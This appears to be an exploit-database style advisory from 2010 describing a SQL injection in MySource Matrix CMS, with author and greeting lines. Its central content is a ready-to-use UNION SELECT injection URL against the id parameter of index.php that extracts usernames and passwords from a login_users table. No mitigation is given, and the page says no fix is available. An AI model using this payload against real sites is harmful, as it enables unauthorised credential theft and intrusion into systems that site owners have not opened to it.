MySource Matrix CMS SQL Injection Vulnerability

2010-11-02 09:15:39

In The Name Of GOD
[+] Exploit Title: MySource Matrix SQL Injection Vulnerability
[+] Date: 2010-11-02
[+] Author : Cru3l.b0y
[+] Software Link: http://www.intendance.com/client-services/developing-your-site/content-management/mysource-matrix/
[+] Tested on: Ubuntu 10.10
[+] Contact : [email protected]
[+] Website : WwW.PenTesters.IR
[+] Greeting: Behzad, Ahmad, ...

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] Exploit :

http://target/path/index.php?id=-1+union+select+1,2,3,4,5,6,group_concat(username,0x3a,password),8,9,10,11,12,13,14+from+login_users

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.